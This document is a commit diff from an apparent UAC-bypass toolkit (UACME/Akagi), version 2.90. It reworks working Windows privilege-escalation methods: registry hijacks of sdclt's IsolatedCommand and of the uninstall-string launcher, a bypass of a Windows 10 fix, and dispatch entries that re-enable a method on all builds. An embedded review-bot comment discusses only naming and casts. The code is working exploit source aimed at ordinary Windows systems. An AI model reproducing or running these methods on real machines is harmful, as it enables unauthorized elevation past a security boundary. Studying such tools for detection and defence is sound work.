v 2.9.0
Internal rearrangement. Marking 42 as unfixed again as it produces mixed results on different Windows 10 builds.
This commit is contained in:
parent
182bf30266
commit
d033e6cd41
@ -393,8 +393,8 @@ Keys (watch debug output with dbgview or similar for more info):
|
|||
* Component(s): Attacker defined
|
||||
* Implementation: ucmFwCplLuaMethod
|
||||
* Works from: Windows 7 (7600)
|
||||
* Fixed in: Windows 10 RS4 (17134)
|
||||
* How: Shell API update
|
||||
* Fixed in: unfixed :see_no_evil:
|
||||
* How: -
|
||||
43. Author: Oddvar Moe derivative
|
||||
* Type: Elevated COM interface
|
||||
* Method: IColorDataProxy, ICMLuaUtil
|
||||
|
|
|
@ -34,6 +34,8 @@
|
|||
#define T_APP_PATH L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\"
|
||||
#define T_DISPLAY_CALIBRATION L"Software\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration"
|
||||
#define T_DOTNET_CLIENT L"Software\\Microsoft\\Windows NT\\CurrentVersion\\KnownFunctionTableDlls"
|
||||
#define T_UNINSTALL L"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"
|
||||
|
||||
#define T_MSC_SHELL L"Software\\Classes\\mscfile"
|
||||
#define T_EXEFILE_SHELL L"Software\\Classes\\exefile"
|
||||
#define T_MSSETTINGS L"Software\\Classes\\ms-settings"
|
||||
|
@ -52,6 +54,8 @@
|
|||
#define T_ISOLATEDCOMMAND L"IsolatedCommand"
|
||||
#define T_DELEGATEEXECUTE L"DelegateExecute"
|
||||
|
||||
#define T_UNINSTALL_STRING L"UninstallString"
|
||||
|
||||
#define BINARYPATH_TAG L"binarypatch01"
|
||||
|
||||
#define MSFT_FULL L"Microsoft Corporation"
|
||||
|
|
|
@ -4,9 +4,9 @@
|
|||
*
|
||||
* TITLE: COMET.C
|
||||
*
|
||||
* VERSION: 2.87
|
||||
* VERSION: 2.90
|
||||
*
|
||||
* DATE: 19 Jan 2018
|
||||
* DATE: 16 July 2018
|
||||
*
|
||||
* Comet method (c) BreakingMalware
|
||||
* For description please visit original URL
|
||||
|
@ -123,7 +123,7 @@ BOOL ucmCometMethod(
|
|||
persistFile->lpVtbl->Release(persistFile);
|
||||
|
||||
_strcpy(szCombinedPath, g_ctx.szTempDirectory);
|
||||
_strcat(szCombinedPath, L"huy32");
|
||||
_strcat(szCombinedPath, SOMEOTHERNAME);
|
||||
_strcpy(szLinkFile, szCombinedPath);
|
||||
_strcat(szLinkFile, T_CLSID_MYCOMPUTER_COMET);
|
||||
|
||||
|
|
|
@ -4,9 +4,9 @@
|
|||
*
|
||||
* TITLE: ENIGMA0X3.C
|
||||
*
|
||||
* VERSION: 2.89
|
||||
* VERSION: 2.90
|
||||
*
|
||||
* DATE: 14 Jun 2018
|
||||
* DATE: 16 July 2018
|
||||
*
|
||||
* Enigma0x3 autoelevation methods and everything based on the same
|
||||
* ShellExecute related registry manipulations idea.
|
||||
|
@ -478,22 +478,23 @@ BOOL ucmSdcltIsolatedCommandMethod(
|
|||
// There is a fix of original concept in 16237 RS3.
|
||||
// Bypass it.
|
||||
//
|
||||
if (g_ctx.dwBuildNumber >= 16237)
|
||||
if (g_ctx.dwBuildNumber >= 16237) {
|
||||
lpTargetValue = TEXT("");
|
||||
}
|
||||
else {
|
||||
lpTargetValue = T_ISOLATEDCOMMAND;
|
||||
|
||||
//
|
||||
// Save old value if exist.
|
||||
//
|
||||
cbOldData = MAX_PATH * 2;
|
||||
RtlSecureZeroMemory(&szOldValue, sizeof(szOldValue));
|
||||
lResult = RegQueryValueEx(hKey, lpTargetValue, 0, NULL,
|
||||
(BYTE*)szOldValue, &cbOldData);
|
||||
if (lResult == ERROR_SUCCESS)
|
||||
bExist = TRUE;
|
||||
}
|
||||
|
||||
//
|
||||
// Save old value if exist.
|
||||
//
|
||||
cbOldData = MAX_PATH * 2;
|
||||
RtlSecureZeroMemory(&szOldValue, sizeof(szOldValue));
|
||||
lResult = RegQueryValueEx(hKey, lpTargetValue, 0, NULL,
|
||||
(BYTE*)szOldValue, &cbOldData);
|
||||
if (lResult == ERROR_SUCCESS)
|
||||
bExist = TRUE;
|
||||
|
||||
cbData = (DWORD)((1 + sz) * sizeof(WCHAR));
|
||||
|
||||
lResult = RegSetValueEx(
|
||||
|
|
|
@ -4,9 +4,9 @@
|
|||
*
|
||||
* TITLE: EXPLIFE.C
|
||||
*
|
||||
* VERSION: 2.87
|
||||
* VERSION: 2.90
|
||||
*
|
||||
* DATE: 19 Jan 2018
|
||||
* DATE: 19 July 2018
|
||||
*
|
||||
* ExpLife UAC bypass using IARPUninstallStringLauncher.
|
||||
* For description please visit original URL
|
||||
|
@ -104,7 +104,7 @@ BOOL ucmUninstallLauncherMethod(
|
|||
if (CoCreateGuid(&guid) != S_OK)
|
||||
break;
|
||||
|
||||
_strcpy(szKeyName, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"));
|
||||
_strcpy(szKeyName, T_UNINSTALL);
|
||||
if (StringFromGUID2(&guid, szGuid, sizeof(szGuid) / sizeof(WCHAR))) {
|
||||
_strcat(szKeyName, szGuid);
|
||||
|
||||
|
@ -115,7 +115,7 @@ BOOL ucmUninstallLauncherMethod(
|
|||
break;
|
||||
|
||||
cbData = (1 + _strlen(lpszExecutable)) * sizeof(WCHAR);
|
||||
lResult = RegSetValueEx(hKey, TEXT("UninstallString"), 0, REG_SZ, (BYTE*)lpszExecutable,
|
||||
lResult = RegSetValueEx(hKey, T_UNINSTALL_STRING, 0, REG_SZ, (BYTE*)lpszExecutable,
|
||||
(DWORD)cbData);
|
||||
|
||||
if (lResult != ERROR_SUCCESS)
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
*
|
||||
* VERSION: 2.90
|
||||
*
|
||||
* DATE: 10 July 2018
|
||||
* DATE: 01 Aug 2018
|
||||
*
|
||||
* UAC bypass dispatch.
|
||||
*
|
||||
|
@ -68,7 +68,7 @@ UCM_API(MethodSPPLUAObject);
|
|||
ULONG CALLBACK IsMethodNeedRemediation(
|
||||
PVOID Parameter);
|
||||
|
||||
UCM_EXTRA_CONTEXT g_ucmWDCallback = { IsMethodNeedRemediation, NULL };
|
||||
UCM_EXTRA_CONTEXT g_ucmWDCallback;
|
||||
|
||||
UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
|
||||
{ MethodTest, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
|
||||
|
@ -113,7 +113,7 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
|
|||
{ MethodCorProfiler, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
|
||||
{ MethodCOMHandlers, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
|
||||
{ MethodCMLuaUtil, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
|
||||
{ MethodFwCplLua, &g_ucmWDCallback, { 7600, 17134 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
|
||||
{ MethodFwCplLua, &g_ucmWDCallback, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
|
||||
{ MethodDccwCOM, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
|
||||
{ MethodVolatileEnv, NULL, { 7600, 16229 }, FUBUKI_ID, FALSE, TRUE, TRUE },
|
||||
{ MethodSluiHijack, &g_ucmWDCallback, { 9600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
|
||||
|
@ -122,6 +122,26 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
|
|||
{ MethodSPPLUAObject, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }
|
||||
};
|
||||
|
||||
/*
|
||||
* SetupExtraContextCalbacks
|
||||
*
|
||||
* Purpose:
|
||||
*
|
||||
* Configure extra context callbacks.
|
||||
*
|
||||
*/
|
||||
VOID SetupExtraContextCalbacks(
|
||||
VOID
|
||||
)
|
||||
{
|
||||
g_ucmWDCallback.Parameter = (PVOID)g_ctx.IsWow64;
|
||||
g_ucmWDCallback.Routine = IsMethodNeedRemediation;
|
||||
|
||||
//
|
||||
// Reserved for future use.
|
||||
//
|
||||
}
|
||||
|
||||
/*
|
||||
* IsMethodNeedRemediation
|
||||
*
|
||||
|
@ -266,6 +286,8 @@ BOOL MethodsManagerCall(
|
|||
}
|
||||
}
|
||||
|
||||
SetupExtraContextCalbacks();
|
||||
|
||||
bResult = Entry->Routine(Method, Entry->ExtraContext, PayloadCode, PayloadSize);
|
||||
|
||||
if (PayloadCode) {
|
||||
|
@ -938,7 +960,7 @@ UCM_API(MethodFwCplLua)
|
|||
if (g_ctx.dwBuildNumber >= 9600) {
|
||||
if (ExtraContext) {
|
||||
if (ExtraContext->Routine) {
|
||||
if (ExtraContext->Routine((PVOID)g_ctx.IsWow64) != STATUS_NO_SECRETS)
|
||||
if (ExtraContext->Routine(ExtraContext->Parameter) != STATUS_NO_SECRETS)
|
||||
g_ctx.MethodExecuteType = ucmExTypeRemediationRequired;
|
||||
}
|
||||
}
|
||||
|
@ -993,14 +1015,13 @@ UCM_API(MethodSluiHijack)
|
|||
LPWSTR lpszPayload = NULL;
|
||||
|
||||
UNREFERENCED_PARAMETER(Method);
|
||||
UNREFERENCED_PARAMETER(ExtraContext);
|
||||
UNREFERENCED_PARAMETER(PayloadCode);
|
||||
UNREFERENCED_PARAMETER(PayloadSize);
|
||||
|
||||
if (g_ctx.dwBuildNumber >= 9600) {
|
||||
if (ExtraContext) {
|
||||
if (ExtraContext->Routine) {
|
||||
if (ExtraContext->Routine((PVOID)g_ctx.IsWow64) != STATUS_NO_SECRETS)
|
||||
if (ExtraContext->Routine(ExtraContext->Parameter) != STATUS_NO_SECRETS)
|
||||
g_ctx.MethodExecuteType = ucmExTypeRemediationRequired;
|
||||
}
|
||||
}
|
||||
|
@ -1063,4 +1084,4 @@ UCM_API(MethodSPPLUAObject)
|
|||
return ucmSPPLUAObjectMethod(PayloadCode, PayloadSize);
|
||||
}
|
||||
|
||||
#pragma warning(pop)
|
||||
#pragma warning(pop)
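Review bot: The new function is named `SetupExtraContextCalbacks` (in its header comment, its definition and the call site added in MethodsManagerCall), a misspelling of "Callbacks" that every future caller will have to copy; renaming it to `SetupExtraContextCallbacks` now is cheap. `g_ucmWDCallback.Parameter = (PVOID)g_ctx.IsWow64;` stores an integer flag in a pointer field; if IsWow64 is a BOOL, writing it as `(PVOID)(ULONG_PTR)g_ctx.IsWow64` avoids the int-to-wider-pointer warning (C4312) on x64 and makes the convention explicit, since the same value is read back as `ExtraContext->Parameter` in the MethodFwCplLua and MethodSluiHijack hunks. The header comment could also state that the routine runs on every MethodsManagerCall invocation before the dispatch and is safe to repeat because it only reassigns the two fields of the global, e.g. `* Called from MethodsManagerCall before each dispatch; idempotent.`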
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
*
|
||||
* VERSION: 2.90
|
||||
*
|
||||
* DATE: 10 July 2018
|
||||
* DATE: 01 Aug 2018
|
||||
*
|
||||
* Prototypes and definitions for UAC bypass methods table.
|
||||
*
|
||||
|
|
|
@ -1,27 +1,27 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LocalDebuggerCommandArguments>0</LocalDebuggerCommandArguments>
|
||||
<LocalDebuggerCommandArguments>42</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'">
|
||||
<LocalDebuggerCommandArguments>0</LocalDebuggerCommandArguments>
|
||||
<LocalDebuggerCommandArguments>42</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LocalDebuggerCommandArguments>0</LocalDebuggerCommandArguments>
|
||||
<LocalDebuggerCommandArguments>42</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'">
|
||||
<LocalDebuggerCommandArguments>0</LocalDebuggerCommandArguments>
|
||||
<LocalDebuggerCommandArguments>42</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LocalDebuggerCommandArguments>0</LocalDebuggerCommandArguments>
|
||||
<LocalDebuggerCommandArguments>42</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LocalDebuggerCommandArguments>0</LocalDebuggerCommandArguments>
|
||||
<LocalDebuggerCommandArguments>42</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
</Project>
|
16
UACME.sha256
16
UACME.sha256
|
@ -12,20 +12,20 @@ a0a07303b0cf4591542c18436aa579d0ed91f880fcdf01e2796b5bf03dc311d0 *Source\Akagi\b
|
|||
5eafc42613cbf70c4ee53f0511befc8a0ddd212f83387877a9883d05036f493c *Source\Akagi\bin64res.rc
|
||||
c401577184f2f57d56fea4c03e0cc1c18a7785bf8b251ca658ade5685a9848c3 *Source\Akagi\compress.c
|
||||
9f93bbb4c77349179641415ec9a4367a6f77dc28b093d3d11231f6abf8c3cd78 *Source\Akagi\compress.h
|
||||
f98bea095c00078ae9be90e276ff36cceeaecd8f3c3bc79a8ba0db3e72d92aeb *Source\Akagi\consts.h
|
||||
2941a15a2787f4e2d5fafa8cde6db6d898135951df5bbe1059ff3cf87f4e18d3 *Source\Akagi\consts.h
|
||||
44bd12f1712f8390bda2ecd6fb4e763c320239ac25e31f426bd91656647bf38d *Source\Akagi\global.h
|
||||
4e740d5caffc8068a07e6ca862ed85de1de383e45cf31013c9e36efdf6a8b111 *Source\Akagi\main.c
|
||||
a8ec3b9411f2408b5cfa4b0c77aa045957d3144aebd343cfa7da03d78226e3b3 *Source\Akagi\makecab.c
|
||||
bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\makecab.h
|
||||
f1b82b53b74b4586c58b0e3a87aceb1ee43e493ef58aa9490297c6bbef247de0 *Source\Akagi\manifest.h
|
||||
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
|
||||
49b33e6032f42dde93e7b03efb17290eaf65c4fab95b5753fbf335722916cb52 *Source\Akagi\Resource.rc
|
||||
0de1eadbf92af6616dc03fbf8a0800166f42613f0a31680f940c3aa309587ba2 *Source\Akagi\Resource.rc
|
||||
b002efa2d4bebd83b8fad8b6d2ec525de57919796bffa0577ab49a7a179cba7f *Source\Akagi\sup.c
|
||||
3479b565d7a469087825838cd724eb58187e4df92ff86e2f65dde746fca8ec17 *Source\Akagi\sup.h
|
||||
a13d31cf040775c51471e3fe6b4863d879fefb189798a24f76189abaebdbdf27 *Source\Akagi\uacme.suppress
|
||||
a7d382431eb421142fcc28156364f60e807ca4818b350a6b6b614ab6542e9074 *Source\Akagi\uacme.vcxproj
|
||||
92069b7b38ee6ce5c2e8a9189c078f2ccd251fab0514d362d5f0a13e95d08aeb *Source\Akagi\uacme.vcxproj.filters
|
||||
cc2dfcc6ea3c2c3f81ba00d43c104466b4c6b3208563a7fd3707131160bbd1f4 *Source\Akagi\uacme.vcxproj.user
|
||||
cd9b79b5e8e8a9c2a7a8afcf49d685f50368fb20ad2d4c133eb835e133ad82d5 *Source\Akagi\uacme.vcxproj.user
|
||||
425b613c924b247fbd40967f4d25c432edddef1c1599cb5cb5c50f5cf0490b6e *Source\Akagi\bin\Akatsuki64.cd
|
||||
1a2e3df7ad3adc7e4c381e5dc2169e759567bd5c3801b38cc50180c81aad8756 *Source\Akagi\bin\Fubuki32.cd
|
||||
579e447729ba32e0d5d69146acbc048e3aaa8c9f404c0ae481f44d494ff77bae *Source\Akagi\bin\Fubuki64.cd
|
||||
|
@ -49,15 +49,15 @@ fbab853743692f7d3fa52343e85518aa9fdc462b389c9847e5f8628efb7432d3 *Source\Akagi\m
|
|||
86471743844fedc7910c20b259c55504c4f28dad9df7c8f95a67fa626727ecbf *Source\Akagi\methods\carberp.c
|
||||
16253a3986916f936630970a044d62d20dcce961ed074c988013ee17669b9906 *Source\Akagi\methods\carberp.h
|
||||
c62f98b79c86e4fa6b90f8af480f18bc21e2dc90af268ce6ba6e343789ac3856 *Source\Akagi\methods\cdproxy.h
|
||||
020c20e6c225f4fde1b7df23c9d56ffe903a9f45936814984d8a72b1b7b82cc1 *Source\Akagi\methods\comet.c
|
||||
ade9abba42c00fa2f7427a88ca8035180dfd62acabb1831ee68584af2486653e *Source\Akagi\methods\comet.c
|
||||
7619c01b21279a0f318e7f3c091f5b54f9a37425b4a083e277e0adfc11da2913 *Source\Akagi\methods\comet.h
|
||||
5dbbf2af06f6bf545ab7c889fe7a6cf0653036c545aa29b8dc77086ee3304e10 *Source\Akagi\methods\comfileop.c
|
||||
7c1e67ec03370d4e97fc5947a832090bf8283641c19f7cad1cb8f3d93385bac2 *Source\Akagi\methods\comfileop.h
|
||||
be2ceae57389dcaf814cd5e1fc1c137979b71671eca44a4db445fa2824591691 *Source\Akagi\methods\deroko.c
|
||||
51d35d30ca8bc6a72202fa26aa6f2cb648036d62635cb52d52ee2d6bbc07da2b *Source\Akagi\methods\deroko.h
|
||||
e681867973300526880dd883b71c56de360c4a5c6dbb2ff2e8b43ee3d9cc2469 *Source\Akagi\methods\enigma0x3.c
|
||||
ec11c2f469f7e7f76893e23d7e275f55930f80fd8a080078cfcd86532888e52a *Source\Akagi\methods\enigma0x3.c
|
||||
5c791f3bcdd23a2eabad1afd7205896bc09848d4c62b1efc2c5a777b2b5aabc8 *Source\Akagi\methods\enigma0x3.h
|
||||
8c6acdf8a3a6a2ca5c07cc947ed098c4d6bc8b951558c5f9670048c248748b70 *Source\Akagi\methods\explife.c
|
||||
c81f288adea7caf27d98ba81d7a1350376b72ecdab01edf89b697d77dda4c02e *Source\Akagi\methods\explife.c
|
||||
1b3b895fa6b99df9055b6514e8dc5212ce61cd7d2500c2fea95085440e7b5b34 *Source\Akagi\methods\explife.h
|
||||
3827958bc16dcec779fa5751f1d368370285eb2bddfa30ff803478ee1c2cabf2 *Source\Akagi\methods\fwcpllua.h
|
||||
8430eaf9d06136a6a7e015ccefac85b29476e56024f98a36db5947f8e0fa648e *Source\Akagi\methods\gootkit.c
|
||||
|
@ -66,8 +66,8 @@ e681867973300526880dd883b71c56de360c4a5c6dbb2ff2e8b43ee3d9cc2469 *Source\Akagi\m
|
|||
fb16843d3353e3499d902bdbad39a82e045406f4e4a98da4cbcad2cc28d0cce3 *Source\Akagi\methods\hakril.h
|
||||
6194cd6305dadcfbedbb9d68a6f48ecf029e3b2fc03c313009aed7e2cf57edf3 *Source\Akagi\methods\hybrids.c
|
||||
584dbe0e06fbe88a15f358b2f9d9b5b230deb63d4b8c7469db4f6085be2064d6 *Source\Akagi\methods\hybrids.h
|
||||
bcd5ff3516346a3a73ab224caf5fb8656e82086bb4759d7260af2c4555c9c4e0 *Source\Akagi\methods\methods.c
|
||||
a7ddc62ad4a87b9edd8069ccf6c84bc018d6b54fa8c3f6917a9d43279219f36b *Source\Akagi\methods\methods.h
|
||||
bb0f1b7465ff6c0686d4458d6c4e22f45296eae04e46c49316b5cf8b02b4512d *Source\Akagi\methods\methods.c
|
||||
80f45429311e0d30b2bc714a15f17bdad5d40295b13c33271a4fc6e9c5669f15 *Source\Akagi\methods\methods.h
|
||||
58f7b319b79172a6eb4c563db0a40320d4d6d68d02fb3b164c7875c413bd6184 *Source\Akagi\methods\pitou.c
|
||||
cc1a0a414b6f1bc6b1301fd5119371811fbd6cb99b884356df71d960a8933cc8 *Source\Akagi\methods\pitou.h
|
||||
6fd555cf1bd17921e5b4f7aaefb4cc3dca2483159da3e24703c8412e36bb8354 *Source\Akagi\methods\sandworm.c
|
||||
|
|